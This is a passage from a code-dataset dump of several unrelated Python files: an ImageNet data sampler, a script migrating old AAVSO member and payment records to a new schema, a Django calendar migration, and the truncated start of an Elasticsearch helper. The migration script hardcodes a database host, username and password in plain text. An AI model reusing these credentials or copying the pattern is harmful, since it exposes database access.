1])\n\n\n image_buffer = features[\"image/encoded\"]\n image = imagenet_preprocessing.preprocess_image(\n image_buffer=image_buffer,\n bbox=bbox,\n output_height=DEFAULT_IMAGE_SIZE,\n output_width=DEFAULT_IMAGE_SIZE,\n num_channels=NUM_CHANNELS,\n is_training=is_training)\n image = tf.cast(image, tf.float32)\n\n return image, label\n\n def make(self, is_training):\n \"\"\"Read the images and labels from 'filenames'.\"\"\"\n filenames = self.get_filenames()\n # Repeat infinitely.\n dataset = tf.data.TFRecordDataset(filenames) #.repeat()\n\n # Parse records.\n dataset = dataset.map(lambda val: self.parser(val,is_training=is_training), num_parallel_calls=multiprocessing.cpu_count())\n # dataset = dataset.map(self.parser)\n\n return dataset\n\n\nclass DataSampler(BaseDataSampler):\n\n def num_classes(self):\n \"\"\"Returns the number of classes in the data set.\"\"\"\n return 1001 # +1 for unused background class\n\n def __init__(self, data_dir):\n self.data_dir = data_dir\n\n # download and extract\n # filepath = os.path.join(self.data_dir, \"train.tfrecords\")\n if not tf.gfile.Exists(self.data_dir):\n tf.gfile.MakeDirs(self.data_dir)\n # if not tf.gfile.Exists(filepath):\n # print(\"No files found at \"+filepath)\n\n def num_examples_per_epoch(self,subset='train'):\n if subset == 'train':\n return int(numexamples*(split))\n elif subset == 'validation':\n return int(numexamples*(1-split))\n elif subset == 'test':\n return 50000\n else:\n raise ValueError('Invalid data subset \"%s\"' % subset)\n\n def training(self):\n if not hasattr(DataSampler,\"trainvaldata\"):\n DataSampler.trainvaldata = ImagenetDataset(self.data_dir, subset='train', use_distortion=False).make(is_training=True)\n splitsize_train = self.num_examples_per_epoch(\"train\")\n splitsize_test = self.num_examples_per_epoch(\"test\")\n splitsize_val = 
self.num_examples_per_epoch(\"validation\")\n print(\"Split ratio: \", splitsize_train,\" for Training, \", splitsize_val,\" for Validation,\", splitsize_test,\" for Testing.\")\n return DataSampler.trainvaldata.skip(splitsize_val)\n\n def validation(self):\n if not hasattr(DataSampler,\"trainvaldata\"):\n DataSampler.trainvaldata = ImagenetDataset(self.data_dir, subset='train', use_distortion=False).make(is_training=False)\n return DataSampler.trainvaldata.take(int(numexamples*(1-split)))\n\n def testing(self):\n return ImagenetDataset(self.data_dir, subset='validation', use_distortion=False).make(is_training=False)\n\n\n\n","sub_path":"data/imagenet/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"260367587","text":"'''Migrate old HQ data to the new schema\n\nThis script is kindof ugly as hell. Hopefully you'll never actually need to\nupdate it or use it ever again!\n'''\nfrom __future__ import print_function\n\nimport MySQLdb as mysqldb\nimport re\nimport sqlalchemy\nimport sys\nimport traceback\nimport yaml\nfrom collections import defaultdict\nfrom datetime import date, datetime\nfrom pprint import pprint, pformat\nfrom sqlalchemy import create_engine, MetaData\n\nclass MigrateException(Exception): pass\nclass AbortMember(Exception): pass\n\nCOUNTRY_MAP = {\n 'united states': 'US',\n 'afghanistan': 'AF',\n 'aland islands': 'AX',\n 'albania': 'AL',\n 'algeria': 'DZ',\n 'american samoa': 'AS',\n 'andorra': 'AD',\n 'angola': 'AO',\n 'anguilla': 'AI',\n 'antarctica': 'AQ',\n 'antigua and barbuda': 'AG',\n 'argentina': 'AR',\n 'armenia': 'AM',\n 'aruba': 'AW',\n 'australia': 'AU',\n 'austria': 'AT',\n 'azerbaijan': 'AZ',\n 'azores': 'AZX',\n 'bahamas': 'BS',\n 'bahrain': 'BH',\n 'bangladesh': 'BD',\n 'barbados': 'BB',\n 'belarus': 'BY',\n 'belgium': 'BE',\n 'belize': 'BZ',\n 'benin': 'BJ',\n 'bermuda': 'BM',\n 'bhutan': 'BT',\n 'bolivia': 'BO',\n 'bosnia and herzegovina': 'BA',\n 'botswana': 'BW',\n 'bouvet island': 'BV',\n 'brazil': 'BR',\n 'british indian ocean territory': 'IO',\n 'brunei darussalam': 'BN',\n 'bulgaria': 'BG',\n 'burkina faso': 'BF',\n 'burundi': 'BI',\n 'cambodia': 'KH',\n 'cameroon': 'CM',\n 'canada': 'CA',\n 'canary islands': 'CIX',\n 'cape verde': 'CV',\n 'cayman islands': 'KY',\n 'central african republic': 'CF',\n 'chad': 'TD',\n 'chile': 'CL',\n 'china': 'CN',\n 'christmas island': 'CX',\n 'cocos (keeling) islands': 'CC',\n 'colombia': 'CO',\n 'comoros': 'KM',\n 'congo': 'CG',\n 'congo, the democratic republic of the': 'CD',\n 'cook islands': 'CK',\n 'costa rica': 'CR',\n 'cote d\\'ivoire': 'CI',\n 'croatia': 'HR',\n 'cuba': 'CU',\n 'cyprus': 'CY',\n 'czech republic': 'CZ',\n 'denmark': 'DK',\n 'djibouti': 'DJ',\n 'dominica': 'DM',\n 'dominican republic': 'DO',\n 'ecuador': 'EC',\n 'egypt': 'EG',\n 'el salvador': 'SV',\n 'equatorial guinea': 'GQ',\n 'eritrea': 'ER',\n 'estonia': 'EE',\n 'ethiopia': 'ET',\n 'falkland islands (malvinas)': 'FK',\n 'faroe islands': 'FO',\n 'fiji': 'FJ',\n 'finland': 'FI',\n 'france': 'FR',\n 'french guiana': 'GF',\n 'french polynesia': 'PF',\n 'french southern territories': 'TF',\n 'gabon': 'GA',\n 'gambia': 'GM',\n 'georgia': 'GE',\n 'germany': 'DE',\n 'ghana': 'GH',\n 'gibraltar': 'GI',\n 'greece': 'GR',\n 'greenland': 'GL',\n 'grenada': 'GD',\n 'guadeloupe': 'GP',\n 'guam': 'GU',\n 'guatemala': 'GT',\n 'guernsey': 'GG',\n 'guinea': 'GN',\n 'guinea-bissau': 'GW',\n 'guyana': 'GY',\n 'haiti': 'HT',\n 
'heard island and mcdonald islands': 'HM',\n 'holy see (vatican city state)': 'VA',\n 'honduras': 'HN',\n 'hong kong': 'HK',\n 'hungary': 'HU',\n 'iceland': 'IS',\n 'india': 'IN',\n 'indonesia': 'ID',\n 'iran, islamic republic of': 'IR',\n 'iraq': 'IQ',\n 'ireland': 'IE',\n 'isle of man': 'IM',\n 'israel': 'IL',\n 'italy': 'IT',\n 'jamaica': 'JM',\n 'japan': 'JP',\n 'jersey': 'JE',\n 'jordan': 'JO',\n 'kazakhstan': 'KZ',\n 'kenya': 'KE',\n 'kiribati': 'KI',\n 'korea, democratic people\\'s republic of': 'KP',\n 'korea, republic of': 'KR',\n 'kuwait': 'KW',\n 'kyrgyzstan': 'KG',\n 'lao people\\'s democratic republic': 'LA',\n 'latvia': 'LV',\n 'lebanon': 'LB',\n 'lesotho': 'LS',\n 'liberia': 'LR',\n 'libyan arab jamahiriya': 'LY',\n 'liechtenstein': 'LI',\n 'lithuania': 'LT',\n 'luxembourg': 'LU',\n 'macao': 'MO',\n 'macedonia, the former yugoslav republic of': 'MK',\n 'madagascar': 'MG',\n 'malawi': 'MW',\n 'malaysia': 'MY',\n 'maldives': 'MV',\n 'mali': 'ML',\n 'malta': 'MT',\n 'marshall islands': 'MH',\n 'martinique': 'MQ',\n 'mauritania': 'MR',\n 'mauritius': 'MU',\n 'mayotte': 'YT',\n 'mexico': 'MX',\n 'micronesia, federated states of': 'FM',\n 'moldova': 'MD',\n 'monaco': 'MC',\n 'mongolia': 'MN',\n 'montenegro': 'ME',\n 'montserrat': 'MS',\n 'morocco': 'MA',\n 'mozambique': 'MZ',\n 'myanmar': 'MM',\n 'namibia': 'NA',\n 'nauru': 'NR',\n 'nepal': 'NP',\n 'netherlands': 'NL',\n 'netherlands antilles': 'AN',\n 'new caledonia': 'NC',\n 'new zealand': 'NZ',\n 'nicaragua': 'NI',\n 'niger': 'NE',\n 'nigeria': 'NG',\n 'niue': 'NU',\n 'norfolk island': 'NF',\n 'northern ireland': 'NIX',\n 'northern mariana islands': 'MP',\n 'norway': 'NO',\n 'oman': 'OM',\n 'pakistan': 'PK',\n 'palau': 'PW',\n 'palestinian territory, occupied': 'PS',\n 'panama': 'PA',\n 'papua new guinea': 'PG',\n 'paraguay': 'PY',\n 'peru': 'PE',\n 'philippines': 'PH',\n 'pitcairn': 'PN',\n 'poland': 'PL',\n 'portugal': 'PT',\n 'puerto rico': 'PR',\n 'qatar': 'QA',\n 'reunion': 'RE',\n 'romania': 'RO',\n 'russian federation': 'RU',\n 'rwanda': 'RW',\n 'saint barthelemy': 'BL',\n 'saint helena': 'SH',\n 'saint kitts and nevis': 'KN',\n 'saint lucia': 'LC',\n 'saint martin': 'MF',\n 'saint pierre and miquelon': 'PM',\n 'saint vincent and the grenadines': 'VC',\n 'samoa': 'WS',\n 'san marino': 'SM',\n 'sao tome and principe': 'ST',\n 'saudi arabia': 'SA',\n 'scotland': 'SCX',\n 'senegal': 'SN',\n 'serbia': 'RS',\n 'seychelles': 'SC',\n 'sierra leone': 'SL',\n 'singapore': 'SG',\n 'slovakia': 'SK',\n 'slovenia': 'SI',\n 'solomon islands': 'SB',\n 'somalia': 'SO',\n 'south africa': 'ZA',\n 'south georgia and the south sandwich islands': 'GS',\n 'spain': 'ES',\n 'sri lanka': 'LK',\n 'sudan': 'SD',\n 'suriname': 'SR',\n 'svalbard and jan mayen': 'SJ',\n 'swaziland': 'SZ',\n 'sweden': 'SE',\n 'switzerland': 'CH',\n 'syrian arab republic': 'SY',\n 'taiwan': 'TW',\n 'tajikistan': 'TJ',\n 'tanzania, united republic of': 'TZ',\n 'thailand': 'TH',\n 'timor-leste': 'TL',\n 'togo': 'TG',\n 'tokelau': 'TK',\n 'tonga': 'TO',\n 'trinidad and tobago': 'TT',\n 'tunisia': 'TN',\n 'turkey': 'TR',\n 'turkmenistan': 'TM',\n 'turks and caicos islands': 'TC',\n 'tuvalu': 'TV',\n 'uganda': 'UG',\n 'ukraine': 'UA',\n 'united arab emirates': 'AE',\n 'united states minor outlying islands': 'UM',\n 'united kingdom': 'GB',\n 'uruguay': 'UY',\n 'uzbekistan': 'UZ',\n 'vanuatu': 'VU',\n 'venezuela': 'VE',\n 'viet nam': 'VN',\n 'virgin islands, british': 'VG',\n 'virgin islands, u.s.': 'VI',\n 'wales': 'WAX',\n 'wallis and futuna': 'WF',\n 'western sahara': 
'EH',\n 'yemen': 'YE',\n 'zambia': 'ZM',\n 'zimbabwe': 'ZW',\n\n 'usa': 'US',\n 'russia': 'RU',\n 'england': 'GB',\n 'uk': 'GB',\n 'taiwan republic of china': 'TW',\n 'iran': 'IR',\n 'south korea': 'KR',\n 'cayman islands bwi': 'KY',\n 'tahiti french polynesia': 'PF',\n 'taiwan': 'TW',\n 'holland': 'NL',\n 'colombi': 'CO',\n 'korea south': 'KR',\n}\n\nDB = {\n 'host': 'db.aavso.org',\n 'user': 'aavso_web',\n 'passwd': 'vstar',\n 'db': 'oldhq'\n}\nDB_URI = 'mysql+mysqldb://aavso_web:vstar@db.aavso.org/oldhq?charset=utf8'\n\nclass MemberErrors(object):\n errors = {}\n\n def log(self, memberid, field, value, message='invalid value'):\n if not self.errors.get(memberid):\n self.errors[memberid] = []\n self.errors[memberid].append({\n \"field\": field, \n \"value\": value, \n \"message\": message\n })\n\n def __str__(self):\n return unicode(self).encode('utf8')\n\n def __unicode__(self):\n text = ''\n for id in sorted(self.errors.keys()):\n text += \"Member #\" + str(id) + \"\\n\"\n\n for error in self.errors[id]:\n text += u\" {field}: {value} -- {message}\\n\".format(**error)\n text += '\\n'\n\n return text\n\nmember_errors = MemberErrors()\n\ndef init():\n engine = create_engine(DB_URI)\n meta = MetaData(bind=engine)\n meta.reflect()\n return meta\n\ndef organizations(meta):\n engine = meta.bind\n org_t = meta.tables['organization']\n\n result = engine.execute(org_t.select())\n\n data = []\n for row in result:\n data.append({ \n 'model': 'hq.organization',\n 'pk': int(row.affiliation),\n 'fields': {\n 'name': row.orgname,\n 'abbreviation': row.abbreviation.strip().upper(),\n },\n })\n\n return data\n\ndef certifications(meta):\n engine = meta.bind\n cert_t = meta.tables['certifications']\n\n result = engine.execute(cert_t.select())\n\n data = []\n for row in result:\n data.append({\n 'model': 'hq.certification',\n 'pk': int(row[cert_t.c.id]),\n 'fields': {\n 'name': row[cert_t.c.name],\n },\n })\n\n return data\n\ndef obs_awards(meta):\n awards = [\n 'Visual',\n 'CCD',\n 'PEP',\n 'Photographic',\n 'Solar',\n 'SID',\n ]\n\n data = []\n for award,id in zip(awards, range(1, len(awards)+1)):\n data.append({\n 'model': 'hq.obsaward',\n 'pk': id, \n 'fields': {\n 'name': award,\n },\n })\n\n return data\n\ndef has_nonascii(text):\n for ch in text:\n if ord(ch) > 127:\n return True\n return False\n\ndef t(text):\n text = text or ''\n text = text.strip()\n return text\n\ndef titlize(text, id, field):\n text = t(text)\n \n if text.isupper() or text.islower() and len(text.strip('.')) > 1:\n member_errors.log(id, field, text, 'field has been title-cased')\n text = text.title()\n return text\n\nused_obscodes = []\ndef generate_member(row, payments):\n if payments:\n latest = max(payments, key=lambda x: int(x.Year[:4]))\n else:\n latest = defaultdict(lambda: None)\n member_errors.log(row.memberID, 'payments', '', \n 'member had no associated payments')\n\n id = int(row.memberID)\n\n member = {\n 'model': 'hq.member',\n 'pk': id,\n 'fields': {\n # obscode below\n 'title': titlize(row.title, id, 'title'),\n # given name below\n 'middle_name': titlize(row.middle_name, id, 'middle_name'),\n # family_name below\n 'name_suffix': titlize(row.name_suffix, id, 'name_suffix'),\n\n 'organization': titlize(row.name_ext, id, 'organization'),\n 'address1': titlize(row.address, id, 'address1'),\n 'address2': titlize(row.address_ext, id, 'address2'),\n 'city': titlize(row.city, id, 'city'),\n 'region': t(row.state),\n 'postal': t(row.zip),\n # country below\n 'phone1': t(row.phone1),\n 'phone2': t(row.phone2),\n 'email': 
t(row.email).lower(),\n 'email_optout': bool(row.email_optout),\n\n # special membership below\n 'created': row.Created or date(1900,1,1), # default value\n 'updated': row.Updated or date.today(),\n 'observer_added': row.date_observer_added or None,\n 'member_joined': row.date_joined or None,\n 'astronomer': bool(latest['Astronomer']),\n 'institution': bool(latest['Institution']),\n 'council': bool(latest['Council']),\n 'staff': False,\n 'address_invalid': bool(latest['Invalid_Address']),\n 'deceased': bool(latest['deceased']),\n 'solar_observer': bool(latest['solar_observer']),\n 'notes': t(row.note),\n 'observer_notes': t(row.obsnotes),\n\n 'profession': t(row.profession),\n 'affiliation_id': int(row.affiliation or 0),\n 'nickname': t(row.nickname),\n # birthdate below\n 'howheard': t(row.howheard),\n 'experience': t(row.experience),\n 'member_notes': t(row.member_notes),\n },\n }\n\n ### obscode ###\n if row.obscode:\n obscode = row.obscode.strip()\n if re.match(r'^[A-Z0-9]{1,6}$', obscode):\n if obscode in used_obscodes:\n member_errors.log(row.memberID, 'obscode', row.obscode,\n \"Duplicate obscode--omitting from this record\")\n else:\n used_obscodes.append(obscode)\n member['fields']['obscode'] = obscode\n else:\n member_errors.log(row.memberID, 'obscode', row.obscode)\n\n ### given_name ###\n first_name = t(row.first_name)\n if first_name:\n member['fields']['given_name'] = titlize(first_name, id, 'given_name')\n else:\n member['fields']['given_name'] = '.'\n member_errors.log(row.memberID, 'given_name', '', \n 'member has no first name to export -- set to default (.)')\n\n ### family_name ###\n last_name = t(row.last_name)\n if last_name:\n member['fields']['family_name'] = titlize(last_name, id, 'family_name')\n else:\n member_errors.log(row.memberID, 'last_name', '', \n 'ABORTED: member has no last name to export')\n raise AbortMember(\"No last name!\")\n\n ### country ###\n if row.country:\n code = COUNTRY_MAP.get(row.country.lower(), None)\n if code is None:\n member_errors.log(row.memberID, 'country', row.country, \n 'unknown country')\n else:\n member['fields']['country'] = code\n\n ### birthdate ###\n if row.birthdate:\n ambig_fmts = [\n '%m/%d/%Y',\n '%d/%m/%Y',\n\n '%m-%d-%Y',\n '%d-%m-%Y',\n\n '%m.%d.%Y',\n '%d.%m.%Y',\n ]\n fmts = [\n '%Y/%m/%d',\n '%Y-%m-%d',\n '%Y.%m.%d',\n\n '%B %d, %Y',\n '%b %d, %Y',\n '%B %d %Y',\n '%b %d %Y',\n '%d %B %Y',\n '%d %b %Y',\n ]\n\n bd = None\n text = row.birthdate.strip()\n\n # check against unambiguous formats\n for fmt in fmts:\n try:\n bd = datetime.strptime(text, fmt).date()\n break\n except ValueError:\n continue\n\n if bd:\n member['fields']['birthdate'] = bd\n else: # check against ambiguous formats\n for fmt in ambig_fmts:\n try:\n bd = datetime.strptime(text, fmt).date()\n break\n except ValueError:\n continue\n\n if bd:\n if bd.day <= 12 and bd.month <= 12:\n pass\n #member_errors.log(row.memberID, 'birthdate', \n # row.birthdate, \"birthdate is ambiguous\")\n else:\n member['fields']['birthdate'] = bd\n else: # didn't match any formats\n pass\n #member_errors.log(row.memberID, 'birthdate', row.birthdate,\n # \"couldn't parse birthdate\")\n\n ### special_membership ###\n if latest['membership_type'] == 'H':\n member['fields']['special_membership'] = 'honorary'\n if latest['membership_type'] == 'L':\n member['fields']['special_membership'] = 'lifetime'\n\n ### Check for non-ascii characters and log them ###\n for field in member['fields']:\n txt = member['fields'][field]\n if isinstance(txt, basestring) and 
has_nonascii(txt):\n member_errors.log(row.memberID, field, txt, \n 'Field contains non-ascii characters')\n\n return member\n\ndef generate_payments(member, payments, paid_2011):\n data = []\n ### payments ###\n for payment in payments:\n new_payment = {\n 'model': 'hq.payment',\n 'pk': None,\n 'fields': {\n 'member_id': member['pk'],\n 'amount': 0,\n },\n }\n\n if (payment.membership_type in ('N', 'H', 'L')):\n # not a payment if it's for non-member, honorary, lifetime\n continue\n\n ### type ###\n if payment.membership_type == 'R':\n typ = 'sponsored'\n elif payment.membership_type == 'M':\n typ = 'comp'\n elif payment.limited_income:\n if not payment.paid_membership:\n continue\n typ = 'junior'\n elif payment.membership_type == 'A':\n if not payment.paid_membership:\n continue\n typ = 'annual'\n elif payment.membership_type == 'S':\n if not payment.paid_membership:\n continue\n typ = 'sustaining'\n\n new_payment['fields']['type'] = typ\n\n ### begin/end ###\n years = payment.Year.split('-')\n\n # special for FYs2011-2012\n if payment.Year == '2010-2011':\n if member['pk'] in paid_2011:\n begin = date(2011, 1, 1)\n end = date(2011, 12, 31)\n else:\n begin = date(2010, 10, 1)\n end = date(2011, 9, 30)\n\n elif payment.Year == '2012':\n if member['pk'] in paid_2011:\n begin = date(2012, 1, 1)\n else: \n begin = date(2011, 10, 1)\n end = date(2012, 12, 31)\n\n else:\n # one year, jan-dec\n if len(years) == 1: \n year = int(years[0])\n begin = date(year, 1, 1)\n end = date(year, 12, 31)\n # two years, oct-sep\n else:\n begin, end = years\n begin = date(int(begin), 10, 1)\n end = date(int(end), 9, 30)\n\n new_payment['fields']['begin'] = begin\n new_payment['fields']['end'] = end\n\n data.append(new_payment)\n\n return data\n\ndef generate_sub_payments(member, payments):\n data = []\n ### subscription payments ###\n for payment in payments:\n if not payment.paid_subscriptions:\n continue \n\n def new_payment():\n return {\n 'model': 'hq.subscriptionpayment',\n 'pk': None,\n 'fields': {\n 'member_id': member['pk'],\n },\n }\n\n year = int(payment.Year[-4:])\n ### journal ###\n if payment.Journal or payment.Comp_Journal or payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'journal'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = bool(payment.Comp_Journal)\n data.append(jp)\n\n ### bulletin ###\n if payment.Bulletin or payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'bulletin'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = False\n data.append(jp)\n\n ### solar ###\n if payment.Solar_Bulletin or payment.Comp_Solar or payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'solar'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = bool(payment.Comp_Solar)\n data.append(jp)\n\n ### newsletter ###\n if payment.Paper_Newsletter or payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'newsletter'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = False\n data.append(jp)\n\n ### annual report ###\n if payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'annual'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = False\n data.append(jp)\n return data\n\ndef generate_member_certs(meta, member):\n engine = meta.bind\n cert_t = 
meta.tables['member_certifications']\n\n certs = engine.execute(cert_t.select()\n .where(cert_t.c.member_id == member['pk']))\n\n data = []\n for cert in certs:\n new_cert = {\n 'model': 'hq.membercertification',\n 'pk': None,\n 'fields': {\n 'member_id': member['pk'],\n 'certification_id': int(cert.certification_id),\n 'completed': cert.date_completed,\n 'instructor': bool(cert.instructor),\n },\n }\n\n data.append(new_cert)\n return data\n\nr_obsaward = re.compile(r'([0-9.]+)([kK]?)\\s*(\\d{4})')\ndef gen_obs_awards(row, history, typ):\n data = []\n awards = r_obsaward.findall(history)\n for award in awards:\n level = float(award[0])\n year = int(award[2])\n if award[1] in ('k', 'K'):\n level = int(level * 1000)\n\n data.append({\n 'model': 'hq.memberobsaward',\n 'pk': None,\n 'fields': {\n 'obs_award_id': typ,\n 'member_id': int(row.memberID),\n 'level': level,\n 'year': year,\n },\n })\n return data\n\ndef generate_obs_awards(row):\n data = []\n\n if row.vis_award_history:\n data.extend(gen_obs_awards(row, row.vis_award_history, 1))\n if row.ccd_award_history:\n data.extend(gen_obs_awards(row, row.ccd_award_history, 2))\n if row.pep_award_history:\n data.extend(gen_obs_awards(row, row.pep_award_history, 3))\n if row.ptg_award_history:\n data.extend(gen_obs_awards(row, row.ptg_award_history, 4))\n if row.solar_award_history:\n data.extend(gen_obs_awards(row, row.solar_award_history, 5))\n\n return data\n\n\nclass Required(object): pass\ntable_fields = {\n 'organization': (\n ('id', Required),\n ('name', Required),\n ('abbreviation', Required),\n ),\n 'certification': (\n ('id', Required),\n ('name', Required),\n ),\n 'obsaward': (\n ('id', Required),\n ('name', Required),\n ),\n 'member': (\n ('id', Required),\n ('obscode', None),\n ('title', ''),\n ('given_name', Required),\n ('middle_name', ''),\n ('family_name', Required),\n ('name_suffix', ''),\n\n ('organization', ''),\n ('address1', ''),\n ('address2', ''),\n ('city', ''),\n ('region', ''),\n ('postal', ''),\n ('country', ''),\n ('phone1', ''),\n ('phone2', ''),\n ('email',''),\n ('email_optout',0),\n \n ('special_membership', ''),\n ('created', Required),\n ('updated', Required),\n ('observer_added', None),\n ('member_joined', None),\n ('astronomer', 0),\n ('institution', 0),\n ('council', 0),\n ('staff', 0),\n ('address_invalid', 0),\n ('resigned', 0),\n ('deceased', 0),\n ('solar_observer', 0),\n ('notes', ''),\n ('observer_notes', ''),\n\n ('latitude', None),\n ('longitude', None),\n ('profession', 0),\n ('affiliation_id', Required),\n ('nickname', ''),\n ('birthdate', None),\n ('howheard', ''),\n ('experience', ''),\n ('equipment', ''),\n ('member_notes', ''),\n ),\n 'payment': (\n ('id', Required),\n ('member_id', Required), \n ('type', Required), \n ('amount', Required), \n ('begin', Required),\n ('end', Required),\n ),\n\n 'subscriptionpayment': (\n ('id', Required),\n ('member_id', Required), \n ('publication', Required),\n ('paid', Required),\n ('year', Required),\n ('complementary', False),\n ),\n 'membercertification': (\n ('id', Required),\n ('member_id', Required),\n ('certification_id', Required),\n ('completed', Required),\n ('instructor', Required),\n ),\n 'memberobsaward': (\n ('id', Required),\n ('obs_award_id', Required),\n ('member_id', Required),\n ('level', Required),\n ('year', Required),\n ),\n}\n\nconn = mysqldb.connect(**DB)\ndef sqlize(val):\n if type(val) == unicode:\n val = val.encode('utf8')\n val = conn.escape(val)\n return str(val)\n\ndef generate_mysql(data):\n sql = '''INSERT INTO hq_{table} 
{fields} \\nVALUES {values};\\n\\n'''\n ret = ''\n \n for table in data:\n rows = []\n for row in data[table]:\n vals = []\n for field in table_fields[table]:\n fname, default = field\n if fname == 'id':\n val = row.get('pk', Required)\n else:\n val = row['fields'].get(fname, default)\n\n if val == Required:\n raise Exception(\"Field '{}' is required for table '{}':\\n{}\"\n .format(fname, table, pformat(row)))\n\n vals.append(sqlize(val))\n rows.append('(' + ','.join(vals) + ')')\n\n QSIZE = 1000\n while len(rows):\n ret += sql.format(\n table=table,\n fields='(' + ','.join([t[0] for t in table_fields[table]]) + ')',\n values=',\\n'.join(rows[:QSIZE]),\n )\n rows = rows[QSIZE:]\n\n return ret\n \n\ndef main(argv):\n meta = init()\n engine = meta.bind\n\n member_t = meta.tables['members']\n payment_t = meta.tables['payments']\n paid_2011_t = meta.tables['paid_2011']\n\n members = engine.execute(member_t.select()\n #.where(member_t.c.memberID == 17285)\n )\n paid_2011 = [x.member_id for x in engine.execute(paid_2011_t.select())\n .fetchall()]\n\n data = {\n 'organization': [],\n 'certification': [],\n 'obsaward': [],\n 'member': [],\n 'payment': [],\n 'subscriptionpayment': [],\n 'membercertification': [],\n 'memberobsaward': [],\n }\n data['organization'] = organizations(meta)\n data['certification'] = certifications(meta)\n data['obsaward'] = obs_awards(meta)\n total = 0\n processed = 0\n aborted = 0\n for row in members:\n total += 1\n ### get member's payments ###\n payments = engine.execute(payment_t.select()\n .where(payment_t.c.MemberID == row.memberID)).fetchall()\n\n try:\n member = generate_member(row, payments)\n #data['member'].append(member)\n\n #data['payment'].extend(\n # generate_payments(member, payments, paid_2011))\n data['subscriptionpayment'].extend(\n generate_sub_payments(member, payments))\n #data['membercertification'].extend(\n # generate_member_certs(meta, member))\n #data['memberobsaward'].extend(generate_obs_awards(row))\n\n processed +=1 \n\n except AbortMember as e:\n aborted +=1\n continue \n\n except Exception as e:\n aborted +=1\n print(\"Exception processing Member #\" + str(row.memberID), \n file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n\n print(\"Total processed: \" + str(total), file=sys.stderr)\n print(\"Successfully migrated: \" + str(processed), file=sys.stderr)\n print(\"Aborted: \" + str(aborted), file=sys.stderr)\n\n print(generate_mysql(data))\n print(member_errors, file=sys.stderr)\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"hq/scripts/migrate.py","file_name":"migrate.py","file_ext":"py","file_size_in_byte":27586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"646849115","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport social.apps.django_app.default.fields\nfrom django.conf import settings\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('default', '0003_alter_email_max_length'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Appointment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('writable', models.BooleanField(default=False, editable=False)),\n ],\n ),\n migrations.CreateModel(\n name='Calendar',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),\n 
('title', models.CharField(max_length=100)),\n ('writable', models.BooleanField(default=False, editable=False)),\n ('extra_data', social.apps.django_app.default.fields.JSONField(default=b'{}')),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True)),\n ('social_auth_owner', models.ForeignKey(related_name='owned_calendars', to='default.UserSocialAuth', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),\n ('writable', models.BooleanField(default=False, editable=False)),\n ('title', models.CharField(max_length=100)),\n ('extra_data', social.apps.django_app.default.fields.JSONField(default=b'{}')),\n ('calendar_owner', models.ForeignKey(related_name='owned_events', to='core.Calendar', null=True)),\n ('calendars', models.ManyToManyField(related_name='appointed_events', through='core.Appointment', to='core.Calendar')),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('visible', models.BooleanField(default=False)),\n ('writable', models.BooleanField(default=False, editable=False)),\n ('calendar', models.ForeignKey(to='core.Calendar')),\n ('subscriber', models.ForeignKey(related_name='calendars', to='default.UserSocialAuth')),\n ],\n ),\n migrations.AddField(\n model_name='calendar',\n name='subscribers',\n field=models.ManyToManyField(related_name='subscribed_calendars', through='core.Subscription', to='default.UserSocialAuth'),\n ),\n migrations.AddField(\n model_name='appointment',\n name='calendar',\n field=models.ForeignKey(related_name='events', to='core.Calendar'),\n ),\n migrations.AddField(\n model_name='appointment',\n name='event',\n field=models.ForeignKey(to='core.Event'),\n ),\n ]\n","sub_path":"core/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"166649510","text":"from builtins import object\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search\nfrom pandas.io.json import json_normalize\nimport pandas as pd\nfrom datetime import datetime, timedelta\n\nclass ElasticDF(object):\n '''\n The ElasticDF() class searches Elastic and returns results as a Pandas\n DataFrame. 
